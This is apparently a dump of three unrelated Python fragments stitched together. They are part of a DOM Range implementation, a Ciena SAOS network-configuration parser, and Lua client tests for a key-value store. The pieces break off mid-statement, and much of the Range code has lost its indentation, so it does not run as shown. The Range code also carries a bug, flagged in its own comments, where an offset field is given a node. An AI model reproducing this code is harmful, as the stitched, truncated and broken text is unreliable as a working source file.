                    c = self.startContainer.childNodes[self.startOffset+ctr].cloneNode(1)
                    df.appendChild(c)
        elif self.startContainer == self.commonAncestorContainer:
            # Case 2: the start node is the common ancestor — clone partial
            # copies of the end side walking up to the ancestor.
            #Clone up the endContainer
            #From the start to the end
            lastKids = []
            copyData = None
            if self.endContainer.nodeType in [Node.TEXT_NODE,
                                              Node.COMMENT_NODE,
                                              Node.PROCESSING_INSTRUCTION_NODE]:
                #Adjust the character data
                copyData = self.endContainer.substringData(0,self.endOffset)
            else:
                numDel = self.endOffset
                for ctr in range(numDel):
                    lastKids.append(self.endContainer.childNodes[ctr].cloneNode(1))
            cur = self.endContainer
            while cur.parentNode != self.commonAncestorContainer:
                #Clone all of the way up
                newCur = cur.cloneNode(0)
                if copyData:
                    newCur.data = copyData
                    copyData = None
                for k in lastKids:
                    newCur.appendChild(k)
                lastKids = []
                index = cur.parentNode.childNodes.index(cur)
                # preceding siblings are fully inside the range: deep-clone them
                for ctr in range(index):
                    lastKids.append(cur.parentNode.childNodes[ctr].cloneNode(1))
                lastKids.append(newCur)
                cur = cur.parentNode
            newEnd = cur.cloneNode(0)
            for k in lastKids:
                newEnd.appendChild(k)
            endAncestorChild = cur
            #Extract up to the ancestor of end
            for c in self.startContainer.childNodes:
                if c == endAncestorChild:
                    break
                df.appendChild(c.cloneNode(1))
            df.appendChild(newEnd)
        elif self.endContainer == self.commonAncestorContainer:
            # Case 3: the end node is the common ancestor — mirror of case 2,
            # cloning partial copies of the start side up to the ancestor.
            lastKids = []
            copyData = None
            if self.startContainer.nodeType in [Node.TEXT_NODE,
                                                Node.COMMENT_NODE,
                                                Node.PROCESSING_INSTRUCTION_NODE]:
                #Adjust the character data
                copyData = self.startContainer.substringData(self.startOffset,1+len(self.startContainer.data)-self.startOffset)
            else:
                numDel = len(self.startContainer.childNodes) - self.startOffset
                for ctr in range(numDel):
                    c = self.startContainer.childNodes[self.startOffset+ctr].cloneNode(1)
                    lastKids.append(c)
            cur = self.startContainer
            while cur.parentNode != self.commonAncestorContainer:
                #Clone all of the way up
                newCur = cur.cloneNode(0)
                if copyData:
                    newCur.data = copyData
                    copyData = None
                for k in lastKids:
                    newCur.appendChild(k)
                lastKids = [newCur]
                index = cur.parentNode.childNodes.index(cur)
                # following siblings are fully inside the range: deep-clone them
                for ctr in range(index+1,len(cur.parentNode.childNodes)):
                    lastKids.append(cur.parentNode.childNodes[ctr].cloneNode(1))
                cur = cur.parentNode
            startAncestorChild = cur
            newStart = cur.cloneNode(0)
            for k in lastKids:
                newStart.appendChild(k)
            df.appendChild(newStart)
            #Extract up to the ancestor of start
            startAncestorChild = cur
            startIndex = self.endContainer.childNodes.index(cur)
            lastAdded = None
            for ctr in range(startIndex+1,self.endOffset+1):
                c = self.endContainer.childNodes[ctr].cloneNode(1)
                df.insertBefore(c,lastAdded)
                lastAdded = c
        else:
            # Case 4: general case — clone both sides up to the common
            # ancestor, then everything strictly between them.
            #From the start to the end
            lastStartKids = []
            startCopyData = None
            if self.startContainer.nodeType in [Node.TEXT_NODE,
                                                Node.COMMENT_NODE,
                                                Node.PROCESSING_INSTRUCTION_NODE]:
                #Adjust the character data
                startCopyData = self.startContainer.substringData(self.startOffset,1+len(self.startContainer.data)-self.startOffset)
            else:
                numDel = len(self.startContainer.childNodes) - self.startOffset
                for ctr in range(numDel):
                    c = self.startContainer.childNodes[self.startOffset+ctr].cloneNode(1)
                    lastStartKids.append(c)
            cur = self.startContainer
            while cur.parentNode != self.commonAncestorContainer:
                #Clone all of the way up
                newCur = cur.cloneNode(0)
                if startCopyData:
                    newCur.data = startCopyData
                    startCopyData = None
                for k in lastStartKids:
                    newCur.appendChild(k)
                lastStartKids = [newCur]
                index = cur.parentNode.childNodes.index(cur)
                for ctr in range(index+1,len(cur.parentNode.childNodes)):
                    lastStartKids.append(cur.parentNode.childNodes[ctr].cloneNode(1))
                cur = cur.parentNode
            startAncestorChild = cur
            newStart = cur.cloneNode(0)
            for k in lastStartKids:
                newStart.appendChild(k)
            df.appendChild(newStart)
            lastEndKids = []
            endCopyData = None
            #Delete up the endContainer
            #From the start to the end
            if self.endContainer.nodeType in [Node.TEXT_NODE,
                                              Node.COMMENT_NODE,
                                              Node.PROCESSING_INSTRUCTION_NODE]:
                #Adjust the character data
                endCopyData = self.endContainer.substringData(0,self.endOffset)
            else:
                numDel = self.endOffset
                for ctr in range(numDel):
                    c = self.endContainer.childNodes[ctr].cloneNode(1)
                    lastEndKids.append(c)
            cur = self.endContainer
            while cur.parentNode != self.commonAncestorContainer:
                newCur = cur.cloneNode(0)
                if endCopyData:
                    newCur.data = endCopyData
                    endCopyData = None
                for k in lastEndKids:
                    newCur.appendChild(k)
                lastEndKids = []
                index = cur.parentNode.childNodes.index(cur)
                for ctr in range(index):
                    lastEndKids.append(cur.parentNode.childNodes[ctr].cloneNode(1))
                lastEndKids.append(newCur)
                cur = cur.parentNode
            endAncestorChild = cur
            newEnd = cur.cloneNode(0)
            for k in lastEndKids:
                newEnd.appendChild(k)
            cur = startAncestorChild
            #Extract everything between us
            startIndex = startAncestorChild.parentNode.childNodes.index(startAncestorChild)
            endIndex = endAncestorChild.parentNode.childNodes.index(endAncestorChild)
            for ctr in range(startIndex+1,endIndex):
                c = startAncestorChild.parentNode.childNodes[ctr]
                df.appendChild(c.cloneNode(1))
            df.appendChild(newEnd)
        #Adjust the containers
        #FIXME What the heck is the spec talking about??
        # NOTE(review): per DOM Level 2 Range, cloneContents should leave the
        # range unchanged (only extractContents collapses it), so this whole
        # mutation block is suspect. Also 'endOffset' is assigned a *node*
        # (self.startContainer) rather than an offset — almost certainly a
        # typo for self.startOffset. Confirm against callers before changing.
        self.__dict__['endContainer'] = self.startContainer
        self.__dict__['endOffset'] = self.startContainer
        self.__dict__['commonAncestorContainer'] = self.startContainer
        self.__dict__['collapsed'] = 1
        return df
def cloneRange(self):
if self.detached:
raise InvalidStateErr()
newRange = Range(self._ownerDocument)
newRange.setStart(self.startContainer,self.startOffset)
newRange.setEnd(self.endContainer,self.endOffset)
return newRange
def collapse(self,toStart):
"""Collapse the range"""
if self.detached:
raise InvalidStateErr()
if toStart:
self.__dict__['endContainer'] = self.startContainer
self.__dict__['endOffset'] = self.startOffset
else:
self.__dict__['startContainer'] = self.endContainer
self.__dict__['startOffset'] = self.endOffset
self.__dict__['collapsed'] = 1
self.__dict__['commonAncestorContainer'] = self.startContainer
def compareBoundaryPoints(self,how,sourceRange):
if self.detached:
raise InvalidStateErr()
if not hasattr(sourceRange,'_ownerDocument') or sourceRange._ownerDocument != self._ownerDocument or not isinstance(sourceRange,Range):
raise WrongDocumentErr()
if how == self.START_TO_START:
ac = self.startContainer
ao = self.startOffset
bc = sourceRange.startContainer
bo = sourceRange.startOffset
elif how == self.START_TO_END:
ac = self.startContainer
ao = self.startOffset
bc = sourceRange.endContainer
bo = sourceRange.endOffset
elif how == self.END_TO_END:
ac = self.endContainer
ao = self.endOffset
bc = sourceRange.endContainer
bo = sourceRange.endOffset
elif how == self.END_TO_START:
ac = self.endContainer
ao = self.endOffset
bc = sourceRange.startContainer
bo = sourceRange.startOffset
else:
raise TypeError, how
pos = self.__comparePositions(ac,ao,bc,bo)
if pos == self.POSITION_EQUAL:
return 0
elif pos == self.POSITION_LESS_THAN:
return -1
return 1
def deleteContents(self):
"""Delete the contents defined by this range"""
#NOTE Use 4DOM ReleaseNode cause it is interface safe
from xml.dom.ext import ReleaseNode
if self.detached:
raise InvalidStateErr()
if self.startContainer == self.endContainer:
if self.startOffset == self.endOffset:
return
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
self.startContainer.deleteData(self.startOffset,1+self.endOffset-self.startOffset)
else:
#Delete a set number of children
numDel = self.endOffset - self.startOffset+1
for ctr in range(numDel):
c = self.startContainer.removeChild(self.startContainer.childNodes[self.startOffset])
ReleaseNode(c)
self.__dict__['endContainer'] = self.startContainer
self.__dict__['endOffset'] = self.endContainer
self.__dict__['commonAncestorContainer'] = self.endContainer
self.__dict__['collapsed'] = 1
elif self.startContainer == self.commonAncestorContainer:
#Delete up the endContainer
#From the start to the end
if self.endContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
self.endContainer.deleteData(0,self.endOffset)
else:
numDel = self.endOffset
for ctr in range(numDel):
c = self.endContainer.removeChild(self.endContainer.childNodes[0])
ReleaseNode(c)
cur = self.endContainer
while cur.parentNode != self.commonAncestorContainer:
while cur.previousSibling:
c = cur.parentNode.removeChild(cur.previousSibling)
ReleaseNode(c)
cur = cur.parentNode
#Delete up to the ancestor of end
endAncestorChild = cur
while self.startContainer.firstChild != endAncestorChild:
c = self.startContainer.removeChild(self.startContainer.firstChild)
ReleaseNode(c)
elif self.endContainer == self.commonAncestorContainer:
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
self.startContainer.deleteData(self.startOffset,1+len(self.startContainer.data)-self.startOffset)
else:
numDel = len(self.startContainer.childNodes) - self.startOffset
for ctr in range(numDel):
c = self.startContainer.removeChild(self.startContainer.childNodes[self.startOffset])
ReleaseNode(c)
cur = self.startContainer
while cur.parentNode != self.commonAncestorContainer:
while cur.nextSibling:
c = cur.parentNode.removeChild(cur.nextSibling)
ReleaseNode(c)
cur = cur.parentNode
startAncestorChild = cur
#Delete up to the ancestor of start
startAncestorChild = cur
startIndex = self.endContainer.childNodes.index(cur)
numDel = self.endOffset - startIndex
for ctr in range(numDel):
c = self.endContainer.removeChild(startAncestorChild.nextSibling)
ReleaseNode(c)
else:
#From the start to the end
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
self.startContainer.deleteData(self.startOffset,1+len(self.startContainer.data)-self.startOffset)
else:
numDel = len(self.startContainer.childNodes) - self.startOffset
for ctr in range(numDel):
c = self.startContainer.removeChild(self.startContainer.childNodes[self.startOffset])
ReleaseNode(c)
cur = self.startContainer
while cur.parentNode != self.commonAncestorContainer:
while cur.nextSibling:
c = cur.parentNode.removeChild(cur.nextSibling)
ReleaseNode(c)
cur = cur.parentNode
startAncestorChild = cur
#Delete up the endContainer
#From the start to the end
if self.endContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
self.endContainer.deleteData(0,self.endOffset)
else:
numDel = self.endOffset
for ctr in range(numDel):
c = self.endContainer.removeChild(self.endContainer.childNodes[0])
ReleaseNode(c)
cur = self.endContainer
while cur.parentNode != self.commonAncestorContainer:
while cur.previousSibling:
c = cur.parentNode.removeChild(cur.previousSibling)
ReleaseNode(c)
cur = cur.parentNode
endAncestorChild = cur
cur = startAncestorChild
#Delete everything between us
while cur.nextSibling != endAncestorChild:
c = cur.parentNode.removeChild(cur.nextSibling)
ReleaseNode(c)
#Adjust the containers
#FIXME What the heck is the spec talking about??
self.__dict__['endContainer'] = self.startContainer
self.__dict__['endOffset'] = self.startContainer
self.__dict__['commonAncestorContainer'] = self.startContainer
self.__dict__['collapsed'] = 1
return None
def detach(self):
self.detached = 1
del self.startContainer
del self.endContainer
del self.startOffset
del self.endOffset
del self.collapsed
del self.commonAncestorContainer
def extractContents(self):
"""Extract the contents defined by this range"""
if self.detached:
raise InvalidStateErr()
df = self._ownerDocument.createDocumentFragment()
if self.startContainer == self.endContainer:
if self.startOffset == self.endOffset:
return df
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
data = self.startContainer.substringData(self.startOffset,1+self.endOffset-self.startOffset)
self.startContainer.deleteData(self.startOffset,1+self.endOffset-self.startOffset)
tx = self._ownerDocument.createTextNode(data)
df.appendChild(tx)
else:
#Extrace a set number of children
numDel = self.endOffset - self.startOffset+1
for ctr in range(numDel):
c = self.startContainer.removeChild(self.startContainer.childNodes[self.startOffset])
df.appendChild(c)
elif self.startContainer == self.commonAncestorContainer:
#Delete up the endContainer
#From the start to the end
lastKids = []
copyData = None
#Delete up the endContainer
#From the start to the end
if self.endContainer.nodeType | |
# repo: mwallraf/network-config-parser
import re
from nmsnetlib.parsers.definitions.CienaSAOS import definition as SAOSdefinition
from nmsnetlib.parsers.definitions.CienaERS import definition as ERSdefinition
from nmsnetlib.parsers.definitions.CiscoIOS import definition as CiscoIOSdefinition
from nmsnetlib.models.carrierethernet import SAOSModel, ERSModel
from nmsnetlib.models.cpe import CiscoIOSModel
from nmsnetlib.parsers.blockparser import BlockParser, LineParser
#### import logging
#### logger = logging.getLogger(__name__)
#### #logger.setLevel(logging.DEBUG)
#### logger.setLevel(logging.CRITICAL)
#### screenformatter = logging.Formatter('%(asctime)s - %(name)s [%(lineno)d] - %(levelname)s - %(message)s')
#### logprinter = logging.StreamHandler()
#### logprinter.setFormatter(screenformatter)
#### logger.addHandler(logprinter)
# Sentinel strings used by the parsers below in place of missing data:
# UNKNOWN marks a value that could not be determined; NONE marks a value
# that is known to be deliberately absent (e.g. ring termination ports).
UNKNOWN = '-unknown-'
NONE = '-none-'
class SAOSParser(BlockParser):
def __init__(self, hostname=None, configfile="", keepemptyblocks=False, debug=False):
super(SAOSParser, self).__init__(hostname, configfile, keepemptyblocks, model=SAOSModel(), debug=debug)
#self.parser = "SAOSParser"
# configuration file details
#self.reConfigStart = re.compile("^! (?P<HWTYPE>[0-9]+) Configuration File") ## how to recognize the start of a config file
self.reConfigStart = re.compile("^! ### START OF CONFIG ###")
self.reBlockStart = re.compile("^!{10,}$") ## how to recognize the start of a new block
self.reBlockName = re.compile("^! (?P<BLOCKNAME>[A-Z].*)$")
self.reBlockEnd = re.compile("^$") ## a new block will be created at each reBlockStart, for the last block in the file we will detect an empty line otherwise it will not be processed
#self.reBlockEnd = re.compile("^!$") ## how to recognize the end of a new block
#self.BlockEndRepeat = 2 ## a block starts and ends with a single line with "!"
self.reIgnoreLine = re.compile("^(!+)$")
self.parseSingleLine = True ## if enabled then also parse lines outside blocks
self.pdef = SAOSdefinition
def _is_class(self, o):
"""
Checks if a variable is a Class object (Class)
Returns True if it is
False if it's not
"""
return True if hasattr(o, '__dict__') else False
def _link_references(self):
"""
Link strings to objects if possible.
This function is called as last while parsing the config.
"""
super(SAOSParser, self)._link_references()
## links inside subports (for 87xx)
## - add parentport to the vlan ports
## - link to parentport
for sp in self.model.subports:
# add parentport to the vlan ports
for v in sp.vtags:
vlan = next(iter(list(filter(lambda x: str(v) == str(x.vlan), self.model.vlans))), None)
if vlan is not None:
vlan.ports.append(sp.parentport)
# link to parentport
pp = next(iter(list(filter(lambda x: str(sp.parentport) == str(x.name), self.model.switchports))), None)
if pp is not None:
sp.parentport = pp
## links inside virtual-switches
## - virtual-interfaces (mainly for 87xx)
## - vlans inside a VS are C-VLANS
## - link the port (TODO: should this be a list ?)
## - link the virtual-circuit
for vswitch in self.model.vswitches:
# virtual-interfaces
new_vi = []
for vint in vswitch.virtualinterfaces:
vi = next(iter(list(filter(lambda x: str(x.name) == str(vint), self.model.virtual_interfaces() ))), None)
if vi is not None:
new_vi.append(vi)
else:
new_vi.append(vint)
vswitch.virtualinterfaces = new_vi
# set vlan type to CVLAN
#
## TODO: CVLANS NORMALLY DON'T EXIST, ADD THEM HERE AS A CVLAN
vlan = next(iter(list(filter(lambda x: str(x.vlan) == str(vswitch.vlan), self.model.vlans))), None)
if vlan is not None:
#print("vlan found '{}', {}".format(vswitch.vlan, vlan))
vlan.type.append("CVLAN")
vlan.type = list(set(vlan.type))
vswitch.vlan = vlan
vlan._vswitches.append(vswitch)
else:
## TODO, create the vlan
pass
# link the port
port = next(iter(list(filter(lambda x: str(x.name) == str(vswitch.port), self.model.switchports))), None)
if port is not None:
#print("vlan found '{}', {}".format(vswitch.vlan, vlan))
vswitch.port = port
# link the virtual-cicruit
vcircuit = next(iter(list(filter(lambda x: str(x.name) == str(vswitch.vcircuit), self.model.vcircuits))), None)
if vcircuit is not None:
#print("vlan found '{}', {}".format(vswitch.vlan, vlan))
vswitch.vcircuit = vcircuit
## links inside virtual-circuits
## - vlans type = s-vlan
for vcircuit in self.model.vcircuits:
# set vlan type to SVLAN
vlan = next(iter(list(filter(lambda x: str(x.vlan) == str(vcircuit.vlan), self.model.vlans))), None)
if vlan is not None:
#print("vlan found '{}', {}".format(vswitch.vlan, vlan))
vlan.type.append("SVLAN")
vlan.type = list(set(vlan.type))
vcircuit.vlan = vlan
## links inside vlans
## - link ports
## - _vlans inside ports
for vlan in self.model.vlans:
# link the port
new_ports = []
for port in vlan.ports:
p = next(iter(list(filter(lambda x: str(x.name) == str(port), self.model.switchports))), None)
if p is not None:
new_ports.append(p)
# link the vlan in a switchport
p._vlans.append(vlan)
else:
new_ports.append(port)
vlan.ports = new_ports
## link the services to the vswitch
for svc in self.model.services:
vswitch = next(iter(list(filter(lambda x: str(x.name) == str(svc), self.model.vswitches))), None)
if vswitch is not None:
svc.vswitch = vswitch
# link virtualinterfaces inside vswitch
# for vswitch in self.model.vswitches:
# new_vi = []
# for vint in vswitch.virtualinterfaces:
# vi = next(iter(list(filter(lambda x: str(x.name) == str(vint), self.model.virtual_interfaces() ))), None)
# if vi:
# new_vi.append(vi)
# else:
# new_vi.append(vint)
# vswitch.virtualinterfaces = new_vi
## links inside virtual-rings
## - link vswitches
## - add vlans based on subports (for 87xx)
## - vlans are of type SVLAN
## - link to logical-ring
## - set rpl-owner
for vring in self.model.virtual_rings():
# link the vswitches (TODO: is this correct for 87xx ??)
new_vswitches = []
for vswitch in vring.vswitches:
vs = next(iter(list(filter(lambda x: str(x.name) == str(vswitch), self.model.vswitches))), None)
if vs is not None:
#print("VIRTUAL SWITCH FOUND: {}".format(vs))
new_vswitches.append(vs)
else:
new_vswitches.append(vswitch)
vring.vswitches = new_vswitches
# add S-vlans based on subports (for 87xx)
# vswitch > virtualinterfaces > subports > vtag
for vswitch in (vring.vswitches) :
#vswitchobj = next(iter(list(filter(lambda x: str(x.name) == vswitch, self.model.vswitches))), None)
if self._is_class(vswitch):
for vint in (vswitch.virtualinterfaces or []):
#print("subports: {}".format(self.model.subports))
subportobj = next(iter(list(filter(lambda x: str(x.name) == str(vint), self.model.subports))), None)
if not subportobj:
print("{} - {} - subport {} is not found".format(self.model.host.hostname, vring, vint))
else:
for vtag in (subportobj.vtags or []):
#print("{} - {} - {} - {} s-vlan found".format(self.model.host.hostname, vring, vint, vtag))
vring.vlans.append(vtag)
# set vlan type to SVLAN
new_vlans = []
for vlan in vring.vlans:
v = next(iter(list(filter(lambda x: str(x.vlan) == str(vlan), self.model.vlans))), None)
if v is not None:
#print("VIRTUAL SWITCH FOUND: {}".format(vs))
v.type.append("SVLAN")
v.type = list(set(v.type))
v._virtualrings.append(vring)
new_vlans.append(v)
else:
#vlan._virtualrings.append(vring)
new_vlans.append(vlan)
vring.vlans = new_vlans
# link to the logical ring
lr = next(iter(list(filter(lambda x: x.type == 'logical-ring' and str(x.name) == str(vring.logicalring), self.model.rings))), None)
if lr is not None:
vring.logicalring = lr
# set rplowner
if len(vring.rplownerport) > 0:
vring.rplowner.append(self.model.host.hostname)
# set east-port-termination + west-port-termination
if vring.subring == "east-port-termination":
vring._eastport_termination.append(self.model.host.hostname)
elif vring.subring == "west-port-termination":
vring._westport_termination.append(self.model.host.hostname)
## the only exception is the VR-CMR_xxxx or VR-CMR-BRU-LAB_xxxx rings, this one does not have any termination port
#if vring.name == 'VR-CMR_3801':
if re.match("^VR-CMR(?:\-...\-LAB|\-LAB)?_", vring.name):
vring._eastport_termination.append(NONE)
vring._westport_termination.append(NONE)
# make unique lists
vring.vlans = list(set(vring.vlans))
# ADD vlans to virtual-rings based on vtags in subports for SAOS87
# vswitch > virtualinterfaces > subports > vtag
# for vring in self.model.virtual_rings():
# #print("vring -> {}".format(vring))
# for vswitch in (vring.vswitches) :
# vswitchobj = next(iter(list(filter(lambda x: str(x.name) == vswitch, self.model.vswitches))), None)
# for vint in (vswitchobj.virtualinterfaces or []):
# #print("subports: {}".format(self.model.subports))
# subportobj = next(iter(list(filter(lambda x: str(x.name) == str(vint), self.model.subports))), None)
# if not subportobj:
# print("{} - {} - subport {} is not found".format(self.model.host.hostname, vring, vint))
# else:
# for vtag in (subportobj.vtags or []):
# #print("{} - {} - {} - {} s-vlan found".format(self.model.host.hostname, vring, vint, vtag))
# vring.vlans.append(vtag)
# vring.vlans = list(set(vring.vlans))
# vlan in vswitches, type = c-vlan
# for vswitch in self.model.vswitches:
# vlan = next(iter(list(filter(lambda x: str(x.vlan) == str(vswitch.vlan), self.model.vlans))), None)
# if vlan:
# #print("vlan found '{}', {}".format(vswitch.vlan, vlan))
# vswitch.vlan = vlan
# vlan.type.append("CVLAN")
# vlan.type = list(set(vlan.type))
# ports in vswitches
# for vswitch in self.model.vswitches:
# port = next(iter(list(filter(lambda x: str(x.name) == str(vswitch.port), self.model.switchports))), None)
# if port:
# #print("vlan found '{}', {}".format(vswitch.vlan, vlan))
# vswitch.port = port
# ports in vlans
# for vlan in self.model.vlans:
# new_ports = []
# for port in vlan.ports:
# p = next(iter(list(filter(lambda x: str(x.name) == str(port), self.model.switchports))), None)
# if p:
# new_ports.append(p)
# else:
# new_ports.append(port)
# vlan.ports = new_ports
# vcircuits in vswitches
# for vswitch in self.model.vswitches:
# vcircuit = next(iter(list(filter(lambda x: str(x.name) == str(vswitch.vcircuit), self.model.vcircuits))), None)
# if vcircuit:
# #print("vlan found '{}', {}".format(vswitch.vlan, vlan))
# vswitch.vcircuit = vcircuit
## links inside logical-rings
## - link east-port and west-port
## - link the virtual-ring
for lring in self.model.logical_rings():
# link east-port and west-port
eastport = next(iter(list(filter(lambda x: str(x.name) == str(lring.eastport), self.model.switchports))), None)
westport = next(iter(list(filter(lambda x: str(x.name) == str(lring.westport), self.model.switchports))), None)
if eastport is not None:
lring.eastport = eastport
if westport is not None:
lring.westport = westport
# link the virtual-ring
vr = next(iter(list(filter(lambda x: x.type == 'virtual-ring' and str(x.logicalring) == str(lring.name), | |
XT of k4 to be 0xffffffffff + 10, but really the max
# value is kt_none, so it retains that value when re-reading.
out = self.db.touch_bulk_relative(['k2', 'k4', 'kx'], 10)
self.assertEqual(out, {
'k2': xt2 + 10,
'k4': xt_none + 10})
self.assertXT(['k1', 'k2', 'k3', 'k4'], {
'k1': ('v1', xt1 + 300),
'k2': ('v2', xt2 + 10),
'k3': ('v3', ttl + 300),
'k4': ('v4', xt_none)})
self.assertEqual(self.db.expire_time('k1'), xt1 + 300)
self.assertEqual(self.db.expire_time('k2'), xt2 + 10)
self.assertEqual(self.db.expire_time('k4'), xt_none)
self.assertEqual(self.db.expire_time('kx'), None)
# Verify we can use touch_relative() and also set negative intervals.
out = self.db.touch_relative('k1', -100)
self.assertEqual(out, xt1 + 200)
self.assertEqual(self.db.expire_time('k1'), xt1 + 200)
class TestLuaErrorCode(BaseLuaTestCase):
    def test_error_codes(self):
        """Each server-side error flag raises ProtocolError and leaves the
        matching message retrievable via db.error()."""
        def run_flag(value):
            return self.db.script('_error_code', {'flag': str(value)})

        # Flag 0 means "no error": the script succeeds with an empty result.
        self.assertEqual(run_flag(0), {})

        expected_messages = {
            1: 'noimpl',
            2: 'invalid',
            3: 'logic',
            4: 'internal',
            5: 'norepos',
            6: 'noperm',
            7: 'broken',
            8: 'duprec',
            9: 'norec',
            10: 'system',
            11: 'misc',
        }
        for value in sorted(expected_messages):
            with self.assertRaises(ProtocolError):
                run_flag(value)
            _, message = self.db.error()
            self.assertEqual(expected_messages[value], message)

        # After a successful operation, we get the success code.
        self.db.set('kx', 'vx')
        _, message = self.db.error()
        self.assertEqual(message, 'success')

        # Even though this fails, the error is not set to duprec? Just
        # documenting this weird behavior.
        self.assertFalse(self.db.add('kx', 'vx2'))
        _, message = self.db.error()
        self.assertEqual(message, 'success')
class TestLua(BaseLuaTestCase):
    def test_script_set(self):
        """Exercise the Lua set helpers: sadd/scard/sismember/smembers,
        spop, srem, and the two-set operations sinter/sunion/sdiff.

        Note: counts come back as *strings* (e.g. {'num': '1'}) because the
        protocol is string-based.
        """
        L = self.db.lua
        # Test adding a single item.
        self.assertEqual(L.sadd(key='s1', x='foo'), {'num': '1'})
        self.assertEqual(L.sadd(key='s1', x='foo'), {'num': '0'})
        # Test adding multiple items.
        items = ['bar', 'baz', 'nug']
        ret = L.sadd(key='s1', **{str(i): k for i, k in enumerate(items)})
        self.assertEqual(ret, {'num': '3'})
        # Test get cardinality.
        self.assertEqual(L.scard(key='s1'), {'num': '4'})
        # Test membership.
        self.assertEqual(L.sismember(key='s1', value='bar'), {'num': '1'})
        self.assertEqual(L.sismember(key='s1', value='baze'), {'num': '0'})
        keys = ['bar', 'baz', 'foo', 'nug']
        # Test get members.
        self.assertEqual(sorted(L.smembers(key='s1').values()), sorted(keys))
        self.assertEqual(L.scard(key='s1'), {'num': '4'})
        # Test pop.  Pop order is unspecified, so only membership is checked.
        res = L.spop(key='s1')
        self.assertEqual(res['num'], '1')
        self.assertTrue(res['value'] in keys)
        self.assertEqual(L.scard(key='s1'), {'num': '3'})
        # Pop remaining 3 items.
        for _ in range(3):
            res = L.spop(key='s1')
            self.assertTrue(res['value'] in keys)
        self.assertEqual(L.scard(key='s1'), {'num': '0'})
        # Popping from an empty set reports zero and no value.
        res = L.spop(key='s1')
        self.assertEqual(res, {'num': '0'})
        # Restore all keys.
        L.sadd(key='s1', **{str(i): k for i, k in enumerate(keys)})
        self.assertEqual(L.srem(key='s1', x='nug'), {'num': '1'})
        self.assertEqual(L.srem(key='s1', x='nug'), {'num': '0'})
        # Create another set, s2 {baze, foo, zai}.
        L.sadd(key='s2', a='baze', b='foo', c='zai')
        # Test multiple set operations, {bar, baz, foo} | {baze, foo, zai}.
        res = L.sinter(key='s1', key2='s2').values()
        self.assertEqual(sorted(res), ['foo'])
        res = L.sunion(key='s1', key2='s2').values()
        self.assertEqual(sorted(res), ['bar', 'baz', 'baze', 'foo', 'zai'])
        res = L.sdiff(key='s1', key2='s2').values()
        self.assertEqual(sorted(res), ['bar', 'baz'])
        res = L.sdiff(key='s2', key2='s1').values()
        self.assertEqual(sorted(res), ['baze', 'zai'])
        # sdiff with dest= also stores the result set under 's3'.
        res = L.sdiff(key='s1', key2='s2', dest='s3').values()
        self.assertEqual(sorted(res), ['bar', 'baz'])
        res = L.smembers(key='s3').values()
        self.assertEqual(sorted(res), ['bar', 'baz'])
    def test_script_list(self):
        """Exercise the Lua list helpers: lrpush, lindex, llen, lset, and
        popping from both ends via llpop/lrpop."""
        L = self.db.lua
        self.assertEqual(L.lrpush(key='l1', value='i0'), {'length': '1'})
        # Test appending items to list.
        for i in range(1, 5):
            L.lrpush(key='l1', value='i%s' % i)
        # Test accessing items by index.
        for i in range(5):
            self.assertEqual(L.lindex(key='l1', index=i), {'value': 'i%s' % i})
        # Invalid index returns empty result set.
        self.assertEqual(L.lindex(key='l1', index=6), {})
        # A negative index counts from the end of the list.
        self.assertEqual(L.lindex(key='l1', index=-1), {'value': 'i4'})
        # Get length of list, pop last item, verify length change.
        self.assertEqual(L.llen(key='l1'), {'num': '5'})
        self.assertEqual(L.lrpop(key='l1'), {'value': 'i4'})
        self.assertEqual(L.llen(key='l1'), {'num': '4'})
        # Verify setting indices.
        self.assertEqual(L.lset(key='l1', index=2, value='i2-x'), {'num': '1'})
        self.assertEqual(L.lindex(key='l1', index=2), {'value': 'i2-x'})
        # Drain the list, alternating right/left pops.
        self.assertEqual(L.lrpop(key='l1'), {'value': 'i3'})
        self.assertEqual(L.llpop(key='l1'), {'value': 'i0'})
        self.assertEqual(L.lrpop(key='l1'), {'value': 'i2-x'})
        self.assertEqual(L.llpop(key='l1'), {'value': 'i1'})
        self.assertEqual(L.llen(key='l1'), {'num': '0'})
        # Popping from an empty list yields an empty response.
        self.assertEqual(L.llpop(key='l1'), {})
        self.assertEqual(L.lrpop(key='l1'), {})
def test_list_insert(self):
# Test getting ranges.
L = self.db.lua
for i in range(5):
L.lrpush(key='l1', value='i%s' % i)
R = functools.partial(L.lrange, key='l1')
L.linsert(key='l1', index=1, value='i0.5')
self.assertEqual(R(start=0, stop=3), {'0': 'i0', '1': 'i0.5',
'2': 'i1'})
L.linsert(key='l1', index=-1, value='i3.5')
self.assertEqual(R(), {'0': 'i0', '1': 'i0.5', '2': 'i1', '3': 'i2',
'4': 'i3', '5': 'i3.5', '6': 'i4'})
    def test_script_list_ranges(self):
        """lrange() semantics: start inclusive, stop exclusive, Python-style
        negative indexes; out-of-order or out-of-range bounds yield {}."""
        # Test getting ranges.
        L = self.db.lua
        for i in range(5):
            L.lrpush(key='l1', value='i%s' % i)
        R = functools.partial(L.lrange, key='l1')
        all_items = dict((str(i), 'i%s' % i) for i in range(5))
        # Omitted or boundary start/stop values return the whole list.
        self.assertEqual(R(), all_items)
        self.assertEqual(R(start=0), all_items)
        self.assertEqual(R(start=-5), all_items)
        self.assertEqual(R(stop=5), all_items)
        # Within bounds.
        self.assertEqual(R(start=1, stop=4), {'0': 'i1', '1': 'i2', '2': 'i3'})
        self.assertEqual(R(start=0, stop=1), {'0': 'i0'})
        self.assertEqual(R(start=3), {'0': 'i3', '1': 'i4'})
        self.assertEqual(R(stop=-3), {'0': 'i0', '1': 'i1'})
        self.assertEqual(R(start=1, stop=-3), {'0': 'i1'})
        self.assertEqual(R(start=3, stop=-1), {'0': 'i3'})
        self.assertEqual(R(start=-1), {'0': 'i4'})
